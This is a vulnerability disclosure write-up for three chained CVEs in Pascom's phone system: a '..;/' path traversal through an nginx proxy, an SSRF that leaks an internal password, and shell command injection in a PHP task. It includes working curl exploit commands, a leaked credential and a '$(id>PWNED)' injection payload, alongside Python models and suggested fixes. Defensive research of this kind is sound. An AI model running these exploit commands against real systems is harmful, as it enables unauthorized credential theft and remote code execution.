The story of 3 bugs that led to Unauthorized RCE — Pascom Systems

Introduction

Pascom CPS System Structure

Path traversal in the Nginx to Tomcat reverse proxy (CVE-2021-45968)

# From /etc/nginx/nginx.conf in the `pascom-<hostname>` container
# XMPP server proxy: /services/pluginscript -> localhost:9090
# nginx collapses literal ".." segments before matching the location, but a
# segment spelled "..;" is just a name to nginx and is passed through in $1.
# The servlet container behind it strips ";..." from each segment and only
# then resolves "..", so "..;/..;/..;/" walks out of /plugins/mobydick/pluginscript/.
location ^~ /services/pluginscript {
    rewrite ^/services/pluginscript/(.*) /$1 break;
    proxy_pass http://127.0.0.1:9090/plugins/mobydick/pluginscript/$1$is_args$query_string;
}

Outdated Openfire (XMPP server) jar causes SSRF (CVE-2021-45967)

  • Dump the password using path traversal + SSRF
  • Use the password to exploit the last bug (RCE)
# Dump the password: the ..;/ traversal reaches getFavicon, whose host parameter drives a server-side fetch of the internal sysinfo endpoint
curl -k --path-as-is 'https://192.168.56.105/pascom-confirm/services/pluginscript/..;/..;/..;/getFavicon?host=localhost/services/sysinfo/activeconfig?' -o - 2>/dev/null | jq | grep moby
# Use the password directly against the sysinfo endpoint to confirm it is the right one
curl -k --path-as-is -u "moby:hYXanvhQaD70wOB" "https://192.168.56.105/pascom-confirm/services/sysinfo/activeconfig" -o - 2>/dev/null | grep password
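The two bugs used in the commands above, modelled as an added example (my own Python, not code from the original post and not Pascom's or Openfire's): it simulates how nginx and the servlet container behind it read the `..;/` path differently (the location block from the previous section) and how the getFavicon host parameter turns into a server-side fetch of the internal sysinfo endpoint. Assumptions: the outer `/pascom-confirm/` hop has already been stripped before the location block runs, getFavicon builds its URL as `http://` + host + `/favicon.ico` (modelled here, not Openfire's code), and the hardening checks `views_disagree` and `host_allowed` are mine, not a vendor fix.

```python
# Added example: models of the two parsers involved in CVE-2021-45968 and of the
# getFavicon SSRF (CVE-2021-45967). Not the original post's or Pascom's code.
import ipaddress
import re
from urllib.parse import unquote, urlsplit

PREFIX = "/services/pluginscript"                   # nginx location prefix (from the config)
BACKEND_PREFIX = "/plugins/mobydick/pluginscript/"  # what proxy_pass prepends to $1


def _resolve_dots(path):
    """Collapse literal '.' and '..' segments. A segment spelled '..;' is not
    '..', so it is kept as an ordinary name."""
    out = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)


def nginx_normalize(path):
    """Model of nginx's view of the URI: percent-decode, then collapse dots."""
    return _resolve_dots(unquote(path))


def servlet_normalize(path):
    """Model of the Java servlet container behind the proxy (Tomcat per the
    post): ';param' is dropped from every segment first (RFC 3986 path
    parameters), then dots are collapsed, so '..;' acts as '..'."""
    stripped = "/".join(seg.split(";", 1)[0] for seg in unquote(path).split("/"))
    return _resolve_dots(stripped)


def proxy_rewrite(request_path):
    """The location block: match the prefix on nginx's normalised URI and paste
    the captured remainder ($1) after the backend prefix, unchanged."""
    norm = nginx_normalize(request_path)
    if not norm.startswith(PREFIX + "/"):
        return None
    return BACKEND_PREFIX + norm[len(PREFIX) + 1:]


def backend_path(request_path):
    """Path the servlet container actually dispatches after the proxy hop."""
    upstream = proxy_rewrite(request_path)
    return None if upstream is None else servlet_normalize(upstream)


def views_disagree(request_path):
    """Proxy-side hardening check (mine): refuse any request the two parsers
    would read differently; this catches '..;' without enumerating tricks."""
    return nginx_normalize(request_path) != servlet_normalize(request_path)


def favicon_url(host):
    """Assumed model of the vulnerable getFavicon servlet: the host parameter
    is spliced into a URL that the server then fetches itself."""
    return "http://" + host + "/favicon.ico"


def fetched_target(host):
    """(hostname, path, query) of the server-side request; shows why the
    exploit ends the host parameter with '?'."""
    u = urlsplit(favicon_url(host))
    return u.hostname, u.path, u.query


_HOST_RE = re.compile(r"[A-Za-z0-9.-]{1,253}(?::\d{1,5})?")


def host_allowed(host):
    """Hardened check (mine) for the host parameter: bare hostname[:port]
    only, and no loopback/private/link-local literals. A real fix would also
    resolve the name and check the resulting address before connecting."""
    if not _HOST_RE.fullmatch(host):
        return False
    name = host.rsplit(":", 1)[0]
    try:
        ip = ipaddress.ip_address(name)
        return not (ip.is_loopback or ip.is_private or ip.is_link_local)
    except ValueError:
        return name.lower() != "localhost"
```

The plain `../../../` form is collapsed by nginx before the prefix match and never reaches the backend; only the `..;` form survives the proxy and is then collapsed by the container, landing on `/getFavicon`. The trailing `?` in the host parameter turns the appended `/favicon.ico` into a query string, so the path `/services/sysinfo/activeconfig` is requested unchanged.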

Command injection in a scheduled task (CVE-2021-45966)

class tsk050380 extends ex_task {
    public function perform($pars) {
        if (count($pars) < 2 || count($pars) > 4) {
            $this->logError('Wrong parameters');
            return false;
        }
        // Check parameters
        $tarfile = $pars[0];
        $targetdir = $pars[1];
        if (count($pars) > 2)
            $deleteOutDir = $pars[2];   // any non-empty string such as "True" is truthy
        else
            $deleteOutDir = false;
        if (count($pars) > 3)
            $createOutDir = $pars[3];
        else
            $createOutDir = false;
        if ($createOutDir && !is_dir($targetdir)) {
            // mkdir() creates the name literally, shell metacharacters included
            if (!mkdir($targetdir, 0777, true)) {
                $this->logError("Failed to create output directory: $targetdir");
                return false;
            }
        }
        if (!is_dir($targetdir)) {
            $this->logError("No such directory: $targetdir");
            return false;
        }
        if (!is_file($tarfile)) {
            $this->logError("No such file: $tarfile");
            return false;
        }
        if ($deleteOutDir) {
            $this->logMessage('Clean output directory');
            // RCE: $targetdir comes from the request. realpath() canonicalises the path
            // but does not escape it, so the shell evaluates anything like $(...) in it.
            $ret = $this->execute('rm -rf ' . realpath($targetdir) . '/*');
            if ($ret !== 0) {
                // ...
            }
        }
    }
}

# RCE request: createOutDir makes mkdir() create the literal directory, deleteOutDir then feeds its name to the shell
curl -k -o - --path-as-is -u "moby:hYXanvhQaD70wOB" "https://192.168.56.105/pascom-confirm/services/apply" -H 'Content-Type: application/json' -d '{"task":"050380","executor":"tsk", "args": ["/etc/passwd", "/tmp/MAD_DIR$(id>PWNED)","True","True"] }' 2>/dev/null | jq
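The injection in the task above, replayed as an added example (my own Python transcription, not the post's or Pascom's PHP): the control flow of `perform()` is kept, but the shell call is captured instead of run, so the exact string that would reach the shell for the post's request is visible, next to a replacement that clears the directory without a shell. Assumed: the PHP `execute()` helper passes its argument to a shell (which is what makes the post's request RCE), and the request's `/etc/passwd` is stood in for by a temporary file so the demo runs anywhere.

```python
# Added example: tsk050380::perform() transcribed with the shell call captured.
# Not the original post's or Pascom's code; the execute() stub is an assumption.
import os
import shlex
import shutil
import tempfile


def perform(pars, execute):
    """Control flow of tsk050380::perform(). `execute` receives the command
    string the PHP would hand to the shell and returns its exit status."""
    if not 2 <= len(pars) <= 4:
        return False, "Wrong parameters"
    tarfile, targetdir = pars[0], pars[1]
    delete_out = pars[2] if len(pars) > 2 else False   # "True" (a string) is truthy
    create_out = pars[3] if len(pars) > 3 else False
    if create_out and not os.path.isdir(targetdir):
        os.makedirs(targetdir)      # creates the literal name, '$(' and all
    if not os.path.isdir(targetdir):
        return False, "No such directory: " + targetdir
    if not os.path.isfile(tarfile):
        return False, "No such file: " + tarfile
    if delete_out:
        # realpath() canonicalises symlinks and dots; it escapes nothing
        ret = execute("rm -rf " + os.path.realpath(targetdir) + "/*")
        if ret != 0:
            return False, "Clean failed"
    return True, "ok"


def clear_directory(targetdir):
    """Hardened replacement for the rm -rf line: filesystem calls only, so the
    directory name is never interpreted by a shell. Returns entries removed."""
    base = os.path.realpath(targetdir)
    removed = 0
    for entry in os.scandir(base):
        if entry.is_dir(follow_symlinks=False):
            shutil.rmtree(entry.path)
        else:
            os.unlink(entry.path)
        removed += 1
    return removed


def demo():
    """Replays the post's request inside a temp dir. Returns (task result, the
    command the shell would have received, the same command with the path
    quoted as escapeshellarg()/shlex.quote would, entries removed safely)."""
    tmp = tempfile.mkdtemp()
    tarfile = os.path.join(tmp, "any_existing_file")   # stands in for /etc/passwd
    open(tarfile, "w").close()
    target = os.path.join(tmp, "MAD_DIR$(id>PWNED)")   # directory name from the request
    seen = []
    ok, _ = perform([tarfile, target, "True", "True"], lambda cmd: seen.append(cmd) or 0)
    os.makedirs(os.path.join(target, "sub"))            # constructed contents to clear
    open(os.path.join(target, "a.txt"), "w").close()
    removed = clear_directory(target)
    quoted = "rm -rf " + shlex.quote(os.path.realpath(target)) + "/*"
    shutil.rmtree(tmp)
    return ok, seen[0], quoted, removed
```

Every check in `perform()` passes for the malicious name because `mkdir()` creates it verbatim and `is_dir()` then finds it; the only place the name is interpreted is the shell, where `$(id>PWNED)` runs as command substitution. Quoting the path (PHP `escapeshellarg`) is the minimal fix if a shell must be kept; `clear_directory()` removes the shell entirely, which is the better one.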

RCE Demo

Timeline

  • Dec 29, 2021 → Initial contact with Pascom
  • Jan 3, 2022 → Sent vulnerability details
  • Jan 5, 2022 → Pascom prepares patches, and a grace period before disclosure is set
  • Mar 7, 2022 → Public disclosure

TutorialBoy
